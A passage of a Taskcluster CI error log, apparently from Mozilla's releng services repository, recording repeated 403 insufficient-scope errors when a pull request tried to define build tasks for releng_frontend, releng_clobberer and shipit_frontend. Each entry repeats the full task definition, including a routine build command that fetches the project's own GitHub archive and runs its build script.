\\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.360Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.360Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.360Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.617Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"UKplXhCrTQu5B2oJzyWZKw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 60,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/garbas/mozilla-releng-services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"4760569093551867dee0c25d0d820f1f9915a424\",\n                            \"GITHUB_HEAD_BRANCH\": \"trychooser\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-28T03:19:00.360Z\",\n                    \"deadline\": \"2016-09-29T03:19:00.360Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T5QTsoJ4Q4GRdGkWTeeS2A\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T03:19:00.360Z\"\n                },\n                \"time\": \"2016-09-28T03:19:00.617Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"eyB9KDLxR2GgXtdAl2NXng\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.359Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.359Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.359Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.633Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"eyB9KDLxR2GgXtdAl2NXng\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.359Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.359Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.359Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.633Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"eyB9KDLxR2GgXtdAl2NXng\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 60,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/garbas/mozilla-releng-services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"4760569093551867dee0c25d0d820f1f9915a424\",\n                            \"GITHUB_HEAD_BRANCH\": \"trychooser\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-28T03:19:00.359Z\",\n                    \"deadline\": \"2016-09-29T03:19:00.359Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T5QTsoJ4Q4GRdGkWTeeS2A\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T03:19:00.359Z\"\n                },\n                \"time\": \"2016-09-28T03:19:00.633Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"dVqTtXHWReGsKtmKONKIYA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.362Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.362Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.362Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.686Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"dVqTtXHWReGsKtmKONKIYA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.362Z\\\",\\n  